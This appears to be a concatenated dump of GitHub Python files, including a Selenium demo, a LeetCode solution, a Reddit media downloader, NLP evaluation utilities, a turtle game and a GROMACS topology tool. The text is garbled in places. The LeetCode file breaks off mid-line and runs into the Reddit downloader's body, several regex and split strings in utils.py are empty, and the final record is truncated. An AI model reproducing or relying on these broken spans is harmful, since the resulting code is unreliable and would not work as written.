+{"seq_id":"71353843394","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\n\ndriver = webdriver.Chrome()\n\n# Open a web page\ndriver.get(\"https://www.example.com\")\n\ntext_input_field = driver.find_element(By.ID, \"input_field_id\")\n\n# Create an ActionChains object\naction = ActionChains(driver)\n\n# Perform a keyboard event (typing text) in the input field\ntext_to_type = \"Hello, Selenium\"\naction.send_keys_to_element(text_input_field, text_to_type).perform()\n\n# Close the browser\ndriver.quit()","repo_name":"AmitBoricha/Web-automation-Selenium","sub_path":"keyboard_events.py","file_name":"keyboard_events.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72645377155","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n# Input\ndata_folder = 'data/'\ncontact_points_name = 'contact_points.csv'\norientations_name = 'orientations.csv'\n\nformation_name_1 = 'layer1'\nx_1_alpha = np.array([10.0, 25.0, 40.0]) # x-coordinates of the interfaces of the first layer\nz_1_alpha = np.array([-2.0, -1.0, -2.5]) # z-coordinates of the interfaces of the first layer\n\nformation_name_2 = 'layer2'\nx_2_alpha = np.array([10.0, 25.0, 45.0]) # x-coordinates of the second layer\nz_2_alpha = np.array([-7.0, -8.5, -5.0]) # z-coordinates of the second layer\n\nx_beta = np.array([5.0, 15.0, 15.0, 30.0, 35.0]) # x-coordinates of the orientations\nz_beta = np.array([-5.0, -8.5, -4.0, -5.0, -8.0]) # z-coordinates of the orientations\nazimut_beta = np.array([270.0, 90.0, 270.0, 90.0, 270.0]) # azimuth of the orientations\ndip_beta = np.array([5.0, 25.0, 15.0, 25.0, 20.0]) # dip of the orientations\n\ntry:\n os.mkdir(data_folder)\nexcept:\n pass\n\n# Data frame generation: contact points\nformation_1_alpha = [formation_name_1] * len(x_1_alpha)\nformation_2_alpha = [formation_name_2] * len(x_2_alpha)\n\nd_contact = {'X': x_1_alpha.tolist() + x_2_alpha.tolist(),\n 'Y': np.zeros_like(x_1_alpha).tolist()+np.zeros_like(x_2_alpha).tolist(),\n 'Z': z_1_alpha.tolist() + z_2_alpha.tolist(), 'formation': formation_1_alpha + formation_2_alpha}\ndf_contact = pd.DataFrame(data=d_contact)\ndf_contact.to_csv(data_folder + contact_points_name, index=False) # save data frame\n\n# Data frame generation: orientations\nd_or = {'X': x_beta.tolist(),\n 'Y': 0.0 * (len(x_beta) + len(x_beta)),\n 'Z': z_beta.tolist(),\n 'azimuth': azimut_beta.tolist(),\n 'dip': dip_beta.tolist(),\n 'polarity': 1,\n 'formation': 'common'} # formation is not a necessary field\ndf_or = pd.DataFrame(data=d_or)\ndf_or.to_csv(data_folder + orientations_name, index=False) # save data frame\n\n# Plot data\nfig = plt.figure(figsize=(5, 2.0))\nax = fig.add_axes([0.2, 0.3, 0.4, 0.5])\nax.plot(x_1_alpha, z_1_alpha, 'ro', label='contact point\\nlayer 1')\nax.plot(x_2_alpha, z_2_alpha, 'bo', label='contact point\\nlayer 2')\n\nu_beta = np.zeros((len(x_beta), ))\nv_beta = np.zeros((len(x_beta), ))\nfor i, (azi, dipi) in enumerate(zip(azimut_beta, dip_beta)):\n u_beta[i] = np.sin(dipi * np.pi / 180.0) * np.sin(azi * np.pi / 180.0)\n v_beta[i] = np.cos(dipi * np.pi / 180.0)\n\nax.quiver(x_beta, z_beta, u_beta, v_beta, color='black', label='orientations')\n\nax.legend(bbox_to_anchor=(1.0, 1.05))\nax.set_xlabel('Distance X (m)')\nax.set_ylabel('Depth\\nZ (m)')\nax.set_ylim(-10, 0)\nax.set_xlim(0, 55.0)\n\n\n# Add labels to plot\nfor i, (x_1_alpha_i, z_1_alpha_i) in enumerate(zip(x_1_alpha, z_1_alpha)): # contact points layer1\n label = '$x_{1\\\\alpha' + str(i) + '}$'\n ax.text(x_1_alpha_i + 1.5, z_1_alpha_i, label)\n\nfor i, (x_2_alpha_i, z_2_alpha_i) in enumerate(zip(x_2_alpha, z_2_alpha)): # contact points layer2\n label = '$x_{2\\\\alpha' + str(i) + '}$'\n ax.text(x_2_alpha_i + 1.5, z_2_alpha_i, label)\n\nfor i, (x_beta_i, z_beta_i) in enumerate(zip(x_beta, z_beta)):\n label = '$x_{\\\\beta' + str(i + 1) + '}$'\n ax.text(x_beta_i + 1.5, z_beta_i, label)\n\nfig.savefig(data_folder + 'data.png', format='png', dpi=1200)\n\n\n# plt.show()\n","repo_name":"jc-olalla/Geometric-variability-of-soil-layers-via-universal-cokriging","sub_path":"data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"70106170114","text":"import re\n\nfilename = 'baladhuri_futuh.txt'\ntext = open(filename, mode='r', encoding='utf-8').read()\n\nword = 'فرضة'\nword_instances = re.findall(word, text)\nfreq_word = len(word_instances)\nfreq_word = str(freq_word)\nprint(word + ' appears ' + freq_word + ' times in this text')\n","repo_name":"jedlitools/find-for-me","sub_path":"ex8_word_frequency.py","file_name":"ex8_word_frequency.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"26530613542","text":"# -*- coding:utf-8 -*-\n# @Time : 2020/7/7 22:35 \n# @Author : bendan50\n# @File : Q209-min-sub-array-len.py \n# @Function : 长度最小的子数组\n# 给定一个含有 n 个正整数的数组和一个正整数 s ,找出该数组中满足其和 ≥ s 的长度最小的子数组,\n# 并返回其长度。如果不存在符合条件的子数组,返回 0。\n#\n# 输入:s = 7, nums = [2,3,1,2,4,3]\n# 输出:2\n# 解释:子数组 [4,3] 是该条件下的长度最小的子数组。\n# 输入 s = 213 nums = [12, 28, 83, 4, 25, 26, 25, 2, 25, 25, 25, 12]\n# 输出 8\n# 解释:子数组[83, 4, 25, 26, 25, 2, 25, 25]是该条件下长度最小的子数组\n# @Software: PyCharm\n\nclass Solution:\n def minSubArrayLen(self, s: int, nums) -> int:\n \"\"\"\n 思路:注意子数组的定义,因此不能排序!\n 暴力法:从第一个结点开始,往后累加,满足大于等于s后,记录长度,然后继续从第二个结点开始。\n 循环到数组尾,时间复杂度O(n^2)\n 改进:前后两个指针构建的滑动窗口。sum=nums[head]+...+nums[tail],个数为tail-head+1\n :param s:\n :param nums:\n :return:\n \"\"\"\n #第一步:一直往里加(头结点不变,尾结点往后移),直到满足大于等于s,\n head = tail = 0\n nums_len = len(nums)\n if nums_len == 0:\n return 0\n sum = 0\n ret = nums_len + 1 #子数组的长度,因为寻找最小长度,所以比数组长度大1,当结束时,小于等于数组长度说明有解。\n while tail < nums_len:\n if nums[tail] >= s:\n return 1\n sum += nums[tail]\n if sum >= s:\n #后移前指针\n while sum >= s and head <= tail:\n sum -= nums[head]\n head += 1\n ret = min(ret,tail-head+2) # +2是因为tail-head之间应该+1,但此时sum', '_')\n title = title.replace('|', '_')\n \n # Check the file extension to determine if it's an image or a video\n if url.endswith('.jpg') or url.endswith('.png'):\n response = requests.get(url)\n # Specify the path to the file in the folder\n file_path = os.path.join(post_path, f'{upvotes}_{title}.jpg')\n # Save the file to the specified path\n open(file_path, 'wb').write(response.content)\n\n if post.is_video:\n video_url = post.media['reddit_video']['fallback_url']\n response = requests.get(video_url)\n\n # Specify the path to the file in the folder\n file_path = os.path.join(video_path, f'{upvotes}_{title}.mp4')\n # Save the file to the specified path\n open(file_path, 'wb').write(response.content)","repo_name":"mirelconstantin/reddit-downloader","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"31214627090","text":"from random import randint, choice\n\n\nTASK = 'What is the result of the expression?'\nSTART = 0\nEND = 1000\n\n\ndef get_question_answer():\n number_1 = randint(START, END)\n number_2 = randint(START, END)\n operators = '+', '-', '*'\n random_op = choice(operators)\n question_text = f'{number_1} {random_op} {number_2}'\n if random_op == '+':\n true_answer = number_1 + number_2\n elif random_op == '-':\n true_answer = number_1 - number_2\n elif random_op == '*':\n true_answer = number_1 * number_2\n return question_text, str(true_answer)\n","repo_name":"fyodor91/python-project-49","sub_path":"brain_games/games/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23427851871","text":"import sys\n\n\n\ndef best_option(C, F, X, R, A):\n\tbest = 10000000000000000000\n\tcurrent = 0\n\twhile R < 4*X:\n\n\t\twait_it_out = (X - A) / R\n\t\tif wait_it_out + current < best:\n\t\t\tbest = wait_it_out + current\n\n\t\tcurrent += (C-A) / R\n\t\tR += F\n\t\n\tif current + (X - A) / R < best:\n\t\treturn current + (X - A) / R\n\treturn best\n\ninp = open(sys.argv[1])\n\ncount = int(inp.readline())\n\nfor i in range(0, count):\n\tdata = inp.readline().rstrip().split(\" \")\n\tprint(\"Case #\" + str(i+1) + \": \" + str(best_option(float(data[0]), float(data[1]), float(data[2]), 2.0, 0.0)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/3429.py","file_name":"3429.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31180318828","text":"from pathlib import Path\nfrom tqdm import tqdm\nimport os\nfrom typing import List, Dict, Tuple\nimport re\nimport json\n\n\ndef read_jsonl_file(input_file: Path):\n with open(input_file, 'r') as input_json_file:\n for json_data in input_json_file:\n if json_data != \"\\n\":\n json_data = json.loads(json_data)\n yield (json_data[\"input\"], json_data[\"label\"])\n\n\ndef read_jsonl_files(input_file_list: List[Path]):\n inputs = []\n labels = []\n for input_file in input_file_list:\n for (input, label) in read_jsonl_file(input_file):\n inputs.append(input)\n labels.append(label)\n return (inputs, labels)\n\n\ndef print_format(file_object, input_text, label_text, predict_text):\n file_object.write(f\"input:{input_text}\\n\")\n file_object.write(f\"label:{label_text}\\n\")\n file_object.write(f\"predict:{predict_text}\\n\")\n\n\ndef retrieve_last_string(str: str) -> str:\n match = re.search(r\".*answer :\\s*(.+?) \", str)\n try:\n return match.group(1).replace(' ', '')\n except:\n return None\n\n\ndef clean_ids(ids, pad_id):\n cleaned_ids = [x for x in ids if x != pad_id]\n return cleaned_ids\n\n\ndef clean_html_tags(text: str) -> str:\n cleaned_text = re.sub(r\"\", \"\", text)\n cleaned_text = re.sub(r\"\", \"\", cleaned_text)\n cleaned_text = re.sub(r\"\", \"\", cleaned_text)\n return cleaned_text\n\n\ndef clean_text(text: str) -> str:\n cleaned_text = re.sub(\" \", \"\", (text))\n cleaned_text = clean_html_tags(cleaned_text)\n return cleaned_text\n\n\ndef retrieve_inference(text):\n #text = text.replace(' ', '')\n match = re.search(r\" .*?(.+?)answer\", text)\n try:\n return match.group(1)\n except:\n return None\n\n\ndef eliminate_calculated_index(calculated_list: List[int], test_inputs: List[str], test_labels: List[str]) -> Tuple[List[str], List[str], List[str]]:\n eliminated_test_inputs = []\n eliminated_test_labels = []\n\n for i, (calculated_index, input, label) in enumerate(zip(calculated_list, test_inputs, test_labels)):\n if calculated_index is None:\n eliminated_test_inputs.append(input)\n eliminated_test_labels.append(label)\n return (eliminated_test_inputs, eliminated_test_labels)\n\n\ndef check_step_by_step_skip_inference_err(input_text, label_inference):\n input_inference, _, predict_inference, _ = input_text.split(\"\")\n input_inference = re.sub(r\"calculate:\", \"\", input_inference)\n input_inference = re.sub(r\" \", \"\", input_inference)\n predict_inference = re.sub(r\" \", \"\", predict_inference)\n label_inference = re.sub(r\" \", \"\", label_inference)\n input_inference_list = input_inference.split(\",\")\n predict_inference_list = predict_inference.split(\",\")\n\n input_dict = {}\n for input in input_inference_list:\n if len(input.split(\"=\")) != 2:\n continue\n left_arg, right_arg = input.split(\"=\")\n if not right_arg.isdecimal():\n input_dict[left_arg] = right_arg\n\n first_step = True\n for predict in predict_inference_list:\n if len(predict.split(\"=\")) != 2:\n continue\n left_arg, right_arg = predict.split(\"=\")\n if first_step:\n first_step = False\n if right_arg != input_dict[left_arg]:\n return True\n if right_arg.isdecimal():\n first_step = True\n return False\n\n\ndef token_by_token_eliminate_calculated_index(last_token_list: List[int], test_inputs: List[str], test_labels: List[str]) -> Tuple[List[str], List[str], List[str]]:\n eliminated_test_inputs = []\n eliminated_test_labels = []\n\n for last_token_index, input, label in zip(last_token_list, test_inputs, test_labels):\n if not last_token_index:\n 
eliminated_test_inputs.append(input)\n eliminated_test_labels.append(label)\n return (eliminated_test_inputs, eliminated_test_labels)\n\n\ndef multi_decode(tokenizer, ids_list):\n decoded_list = []\n for ids in ids_list:\n decoded_text = tokenizer.decode(\n ids, skip_special_tokens=False, clean_up_tokenization_spaces=False)\n decoded_list.append(decoded_text)\n return decoded_list\n\n\ndef make_variable_dict(inference_list):\n variable_dict = {}\n for inference in inference_list:\n if len(inference.split(\"=\")) != 2:\n continue\n\n left_arg, right_arg = inference.split(\"=\")\n if right_arg.isdecimal():\n variable_dict[left_arg] = right_arg\n\n return variable_dict\n\n\n# predict\ndef all_at_once_predict(input_id_list, predict_id_list, label_id_list, tokenizer, output_dir, model_name) -> int:\n acc_num = 0\n inference_acc_num = 0\n analyze_file_path = Path(output_dir) / Path('analyze.txt')\n err_file_path = Path(output_dir) / Path('analyze_err.txt')\n inference_err_file_path = Path(\n output_dir) / Path('analyze_inference_err.txt')\n del_analyze_flag = True\n del_analyze_err_flag = True\n del_analyze_inference_err_flag = True\n label_length_list = []\n predict_length_list = []\n\n with open(analyze_file_path, 'w') as f, open(err_file_path, 'w') as f_err, open(inference_err_file_path, \"w\") as f_inference_err:\n for input_ids, predict_ids, label_ids in zip(input_id_list, predict_id_list, label_id_list):\n label_ids[label_ids == -100] = tokenizer.pad_token_id\n if model_name == \"bart\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids[1:], predict_ids[2:]])\n elif model_name == \"t5\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids, predict_ids[1:]])\n\n predict = retrieve_last_string(predict_text)\n label = retrieve_last_string(label_text)\n\n # calc inference length\n cleaned_label_text = clean_text(label_text)\n cleaned_predict_text = clean_text(predict_text)\n label_length_list.append(len(cleaned_label_text))\n predict_length_list.append(len(cleaned_predict_text))\n\n if predict is not None and (predict == label):\n acc_num += 1\n if cleaned_label_text == cleaned_predict_text:\n inference_acc_num += 1\n del_analyze_flag = False\n print_format(f, input_text, label_text, predict_text)\n else:\n del_analyze_inference_err_flag = False\n print_format(f_inference_err, input_text,\n label_text, predict_text)\n else:\n del_analyze_err_flag = False\n print_format(f_err, input_text, label_text, predict_text)\n\n if del_analyze_flag:\n os.remove(analyze_file_path)\n if del_analyze_err_flag:\n os.remove(err_file_path)\n if del_analyze_inference_err_flag:\n os.remove(inference_err_file_path)\n return acc_num, inference_acc_num, label_length_list, predict_length_list\n\n\ndef step_by_step_predict(input_id_list, predict_id_list, label_id_list, tokenizer, output_dir, step_index, model_name, label_length_list, predict_length_list):\n acc_num = 0\n inference_acc_num = 0\n calculated_list = []\n predict_text_list = []\n\n analyze_file_path = Path(output_dir) / Path(f'analyze_{step_index}.txt')\n err_file_path = Path(output_dir) / Path(f'analyze_err_{step_index}.txt')\n inference_err_file_path = Path(\n output_dir) / Path(f'analyze_inference_err_{step_index}.txt')\n over_file_path = Path(\n output_dir) / Path(f'analyze_over_err.txt')\n\n del_analyze_flag = True\n del_analyze_err_flag = True\n del_analyze_inference_err_flag = True\n\n with open(analyze_file_path, 'w') as f, open(err_file_path, 'w') as f_err, 
open(inference_err_file_path, \"w\") as f_inference_err:\n for input_ids, predict_ids, label_ids in zip(input_id_list, predict_id_list, label_id_list):\n label_ids[label_ids == -100] = tokenizer.pad_token_id\n if model_name == \"bart\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids[1:], predict_ids[2:]])\n elif model_name == \"t5\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids, predict_ids[1:]])\n predict_text_list.append(predict_text)\n\n predict = retrieve_last_string(predict_text)\n calculated_list.append(predict)\n label = retrieve_last_string(label_text)\n predict_inference = input_text.split(\"\")[2]\n label_inference = label_text.split(\"answer\")[0]\n\n # calc inference length\n if predict is not None:\n #cleaned_predict_text = clean_text(predict_inference+\",\"+ predict_text)\n cleaned_predict_text = clean_text(\n predict_inference + predict_text)\n cleaned_label_text = clean_text(label_text)\n label_length_list.append(len(cleaned_label_text))\n predict_length_list.append(len(cleaned_predict_text))\n\n if predict is not None and (predict == label):\n acc_num += 1\n if clean_text(predict_inference) == clean_text(label_inference):\n inference_acc_num += 1\n del_analyze_flag = False\n print_format(f, input_text, label_text, predict_text)\n else:\n del_analyze_inference_err_flag = False\n print_format(f_inference_err, input_text,\n label_text, predict_text)\n elif predict is not None:\n del_analyze_err_flag = False\n print_format(f_err, input_text, label_text, predict_text)\n if step_index == 99:\n with open(over_file_path, \"w\") as f_over_err:\n print_format(f_over_err, input_text, label_text, predict_text)\n if del_analyze_flag:\n os.remove(analyze_file_path)\n if del_analyze_err_flag:\n os.remove(err_file_path)\n if del_analyze_inference_err_flag:\n os.remove(inference_err_file_path)\n\n return acc_num, inference_acc_num, calculated_list, predict_text_list, label_length_list, predict_length_list\n\n\ndef token_by_token_predict(input_id_list, predict_id_list, label_id_list, tokenizer, output_dir, step_index, model_name, label_length_list, predict_length_list):\n acc_num = 0\n inference_acc_num = 0\n calculated_list = []\n predict_text_list = []\n analyze_file_path = Path(output_dir) / Path(f'analyze_{step_index}.txt')\n err_file_path = Path(output_dir) / Path(f'analyze_err_{step_index}.txt')\n inference_err_file_path = Path(\n output_dir) / Path(f'analyze_inference_err_{step_index}.txt')\n over_file_path = Path(\n output_dir) / Path(f'analyze_over_err.txt')\n\n del_analyze_flag = True\n del_analyze_err_flag = True\n del_analyze_inference_err_flag = True\n with open(analyze_file_path, 'w') as f, open(err_file_path, 'w') as f_err, open(inference_err_file_path, \"w\") as f_inference_err:\n for input_ids, predict_ids, label_ids in zip(input_id_list, predict_id_list, label_id_list):\n label_ids[label_ids == -100] = tokenizer.pad_token_id\n if model_name == \"bart\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids[1:], predict_ids[2:]])\n elif model_name == \"t5\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids, predict_ids[1:]])\n predict_text_list.append(predict_text)\n\n bool_last_token = predict_text.startswith(\"\")\n\n predict = retrieve_last_string(input_text)\n calculated_list.append(bool_last_token)\n label = retrieve_last_string(label_text)\n\n predict_inference = input_text.split(\"\")[2]\n if 
bool_last_token:\n cleaned_predict_text = clean_text(predict_inference)\n cleaned_label_text = clean_text(label_text)\n label_length_list.append(len(cleaned_label_text))\n predict_length_list.append(len(cleaned_predict_text))\n\n if bool_last_token and (predict == label):\n acc_num += 1\n predict_inference_str = retrieve_inference(input_text)\n label_inference_str = retrieve_inference(\"\"+label_text)\n\n if predict_inference_str == label_inference_str:\n del_analyze_flag = False\n inference_acc_num += 1\n print_format(f, input_text, label_text, predict_text)\n else:\n del_analyze_inference_err_flag = False\n print_format(f_inference_err, input_text,\n label_text, predict_text)\n elif bool_last_token:\n del_analyze_err_flag = False\n print_format(f_err, input_text, label_text, predict_text)\n if step_index == 499:\n with open(over_file_path, \"w\") as f_over_err:\n print_format(f_over_err, input_text, label_text, predict_text)\n\n if del_analyze_flag:\n os.remove(analyze_file_path)\n if del_analyze_err_flag:\n os.remove(err_file_path)\n if del_analyze_inference_err_flag:\n os.remove(inference_err_file_path)\n\n return acc_num, inference_acc_num, calculated_list, predict_text_list, label_length_list, predict_length_list\n","repo_name":"ao1neko/reasoning-strategy","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33560761764","text":"#!/usr/bin/env python3\n\n\"\"\"Module containing the AppendLigand class and the command line interface.\"\"\"\nimport re\nimport argparse\nimport shutil\nfrom pathlib import Path\nfrom biobb_common.generic.biobb_object import BiobbObject\nfrom biobb_common.configuration import settings\nfrom biobb_common.tools import file_utils as fu\nfrom biobb_common.tools.file_utils import launchlogger\n\n\nclass AppendLigand(BiobbObject):\n \"\"\"\n | biobb_md AppendLigand\n | This class takes a ligand ITP file and inserts it in a topology.\n | This module automatizes the process of inserting a ligand ITP file in a GROMACS topology.\n\n Args:\n input_top_zip_path (str): Path the input topology TOP and ITP files zipball. File type: input. `Sample file `_. Accepted formats: zip (edam:format_3987).\n input_itp_path (str): Path to the ligand ITP file to be inserted in the topology. File type: input. `Sample file `_. Accepted formats: itp (edam:format_3883).\n output_top_zip_path (str): Path/Name the output topology TOP and ITP files zipball. File type: output. `Sample file `_. Accepted formats: zip (edam:format_3987).\n input_posres_itp_path (str) (Optional): Path to the position restriction ITP file. File type: input. Accepted formats: itp (edam:format_3883).\n properties (dic):\n * **posres_name** (*str*) - (\"POSRES_LIGAND\") String to be included in the ifdef clause.\n * **remove_tmp** (*bool*) - (True) [WF property] Remove temporal files.\n * **restart** (*bool*) - (False) [WF property] Do not execute if output files exist.\n\n Examples:\n This is a use example of how to use the building block from Python::\n\n from biobb_md.gromacs_extra.append_ligand import append_ligand\n prop = { 'posres_name': 'POSRES_LIGAND' }\n append_ligand(input_top_zip_path='/path/to/myTopology.zip',\n input_itp_path='/path/to/myTopologyAddOn.itp',\n output_top_zip_path='/path/to/newTopology.zip',\n properties=prop)\n\n Info:\n * wrapped_software:\n * name: In house\n * license: Apache-2.0\n * ontology:\n * name: EDAM\n * schema: http://edamontology.org/EDAM.owl\n \"\"\"\n\n def __init__(self, input_top_zip_path: str, input_itp_path: str, output_top_zip_path: str,\n input_posres_itp_path: str = None, properties: dict = None, **kwargs) -> None:\n properties = properties or {}\n\n # Call parent class constructor\n super().__init__(properties)\n\n # Input/Output files\n self.io_dict = {\n \"in\": {\"input_top_zip_path\": input_top_zip_path, \"input_itp_path\": input_itp_path,\n \"input_posres_itp_path\": input_posres_itp_path},\n \"out\": {\"output_top_zip_path\": output_top_zip_path}\n }\n\n # Properties specific for BB\n self.posres_name = properties.get('posres_name', 'POSRES_LIGAND')\n\n # Check the properties\n self.check_properties(properties)\n\n @launchlogger\n def launch(self) -> int:\n \"\"\"Execute the :class:`AppendLigand ` object.\"\"\"\n # Setup Biobb\n if self.check_restart(): return 0\n\n # Unzip topology\n top_file = fu.unzip_top(zip_file=self.io_dict['in'].get(\"input_top_zip_path\"), out_log=self.out_log)\n top_dir = str(Path(top_file).parent)\n itp_name = str(Path(self.io_dict['in'].get(\"input_itp_path\")).name)\n\n with open(top_file) as top_f:\n top_lines = top_f.readlines()\n top_f.close()\n fu.rm(top_file)\n\n forcefield_pattern = r'#include.*forcefield.itp\\\"'\n if top_lines:\n for index, line in enumerate(top_lines):\n if re.search(forcefield_pattern, line):\n break\n else:\n fu.log(f'FATAL: Input topfile {top_file} from input_top_zip_path 
{self.io_dict[\"in\"].get(\"input_top_zip_path\")} is empty.', self.out_log, self.global_log)\n return 1\n\n top_lines.insert(index+1, '\\n')\n top_lines.insert(index+2, '; Including ligand ITP\\n')\n top_lines.insert(index+3, '#include \"' + itp_name + '\"\\n')\n top_lines.insert(index+4, '\\n')\n if self.io_dict['in'].get(\"input_posres_itp_path\"):\n top_lines.insert(index+5, '; Ligand position restraints'+'\\n')\n top_lines.insert(index+6, '#ifdef '+self.posres_name+'\\n')\n top_lines.insert(index+7, '#include \"'+str(Path(self.io_dict['in'].get(\"input_posres_itp_path\")).name)+'\"\\n')\n top_lines.insert(index+8, '#endif'+'\\n')\n top_lines.insert(index+9, '\\n')\n\n inside_moleculetype_section = False\n with open(self.io_dict['in'].get(\"input_itp_path\")) as itp_file:\n moleculetype_pattern = r'\\[ moleculetype \\]'\n for line in itp_file:\n if re.search(moleculetype_pattern, line):\n inside_moleculetype_section = True\n continue\n if inside_moleculetype_section and not line.startswith(';'):\n moleculetype = line.strip().split()[0].strip()\n break\n\n molecules_pattern = r'\\[ molecules \\]'\n inside_molecules_section = False\n index_molecule = None\n molecule_string = moleculetype+(20-len(moleculetype))*' '+'1'+'\\n'\n for index, line in enumerate(top_lines):\n if re.search(molecules_pattern, line):\n inside_molecules_section = True\n continue\n if inside_molecules_section and not line.startswith(';') and line.upper().startswith('PROTEIN'):\n index_molecule = index\n\n if index_molecule:\n top_lines.insert(index_molecule+1, molecule_string)\n else:\n top_lines.append(molecule_string)\n\n new_top = fu.create_name(path=top_dir, prefix=self.prefix, step=self.step, name='ligand.top')\n\n with open(new_top, 'w') as new_top_f:\n new_top_f.write(\"\".join(top_lines))\n\n shutil.copy2(self.io_dict['in'].get(\"input_itp_path\"), top_dir)\n if self.io_dict['in'].get(\"input_posres_itp_path\"):\n shutil.copy2(self.io_dict['in'].get(\"input_posres_itp_path\"), top_dir)\n\n # zip topology\n fu.log('Compressing topology to: %s' % self.io_dict['out'].get(\"output_top_zip_path\"), self.out_log, self.global_log)\n fu.zip_top(zip_file=self.io_dict['out'].get(\"output_top_zip_path\"), top_file=new_top, out_log=self.out_log)\n\n # Remove temporal files\n self.tmp_files.append(top_dir)\n self.remove_tmp_files()\n\n return 0\n\n\ndef append_ligand(input_top_zip_path: str, input_itp_path: str, output_top_zip_path: str,\n input_posres_itp_path: str = None, properties: dict = None, **kwargs) -> int:\n \"\"\"Create :class:`AppendLigand ` class and\n execute the :meth:`launch() ` method.\"\"\"\n return AppendLigand(input_top_zip_path=input_top_zip_path,\n input_itp_path=input_itp_path,\n output_top_zip_path=output_top_zip_path,\n input_posres_itp_path=input_posres_itp_path,\n properties=properties, **kwargs).launch()\n\n\ndef main():\n \"\"\"Command line execution of this building block. 
Please check the command line documentation.\"\"\"\n parser = argparse.ArgumentParser(description=\"Wrapper of the GROMACS editconf module.\",\n formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=99999))\n parser.add_argument('-c', '--config', required=False, help=\"This file can be a YAML file, JSON file or JSON string\")\n\n # Specific args of each building block\n required_args = parser.add_argument_group('required arguments')\n required_args.add_argument('--input_top_zip_path', required=True)\n required_args.add_argument('--input_itp_path', required=True)\n required_args.add_argument('--output_top_zip_path', required=True)\n parser.add_argument('--input_posres_itp_path', required=False)\n\n args = parser.parse_args()\n config = args.config if args.config else None\n properties = settings.ConfReader(config=config).get_prop_dic()\n \n # Specific call of each building block\n append_ligand(input_top_zip_path=args.input_top_zip_path, input_itp_path=args.input_itp_path,\n output_top_zip_path=args.output_top_zip_path, input_posres_itp_path=args.input_posres_itp_path,\n properties=properties)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bioexcel/biobb_md","sub_path":"biobb_md/gromacs_extra/append_ligand.py","file_name":"append_ligand.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"26716971366","text":"from turtle import Screen\nfrom my_turtle import My_turtle\nfrom cars import Car\nfrom level_board import Level\nimport random\nimport time\n\nstart_time = time.time()\ninterval = 2\n\nscreen = Screen()\nscreen.tracer(0)\n\nscreen.colormode(255)\neo = My_turtle(screen)\nlevels = Level(screen)\nscreen.onkey(eo.move, \"w\")\nscreen.listen()\n\nlevel = 0.1\n\ncars = []\nfor i in range(5):\n car = Car(screen)\n cars.append(car)\n\nis_on = True\nwhile is_on:\n screen.update()\n\n random_range = random.randint(4, 7)\n\n current_time = time.time()\n\n if current_time - start_time >= interval:\n for i in range(random_range):\n car = Car(screen)\n cars.append(car)\n start_time = current_time\n\n for i in cars:\n i.move()\n\n if eo.collision(cars):\n # It'll be good to correct collisions, to be more visible and understandable\n eo.move()\n screen.update()\n levels.game_over()\n break\n\n if eo.finish(screen):\n eo.start_pos(screen)\n levels.change_level()\n\n for i in cars:\n i.hideturtle()\n cars.clear()\n\n level *= 0.8\n interval *= 0.8\n\n time.sleep(level)\n\nscreen.exitonclick()\n","repo_name":"Wojtke7/100-Days-of-code-Python","sub_path":"Day 23 Turtle crossing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22375523809","text":"import os\nimport sys\n\nimport anndata as ad\nimport numpy as np\n\n\nclass CalcTRSampleRPMatrix:\n def __init__(self, library='library', output='library', type='H3K27ac'):\n self.data_ad_sample = ad.read_h5ad(\n os.path.join(library, f'RP_Matrix_{type}.h5ad')\n )\n self.data_ad_TR = ad.read_h5ad(os.path.join(library, 'RP_Matrix_TR.h5ad'))\n self.A = ad.read_h5ad(os.path.join(library, f'A_pred_{type}.h5ad'))\n self.A.X[np.diag_indices_from(self.A.X)] = 0\n i = self.data_ad_TR.shape[0]\n self.A = self.A[:i, i:]\n self.library = library\n self.output = output\n self.type = type\n\n def run(self):\n self.A = self.A.to_df().values\n self.A[self.A < 0.0] = 0\n self.X = self.data_ad_sample.to_df().values\n self.A = self.A / (np.sum(self.A, axis=1, keepdims=True) + 1e-17)\n self.X = self.X / (np.linalg.norm(self.X, axis=1, keepdims=True) + 1e-17)\n matrix = self.A.dot(self.X)\n data_ad = ad.AnnData(\n matrix, obs=self.data_ad_TR.obs, var=self.data_ad_TR.var, dtype='float32'\n )\n data_ad.write_h5ad(os.path.join(self.library, f'RP_Matrix_TR_{self.type}.h5ad'))\n\n\nif __name__ == '__main__':\n type = sys.argv[1]\n library = 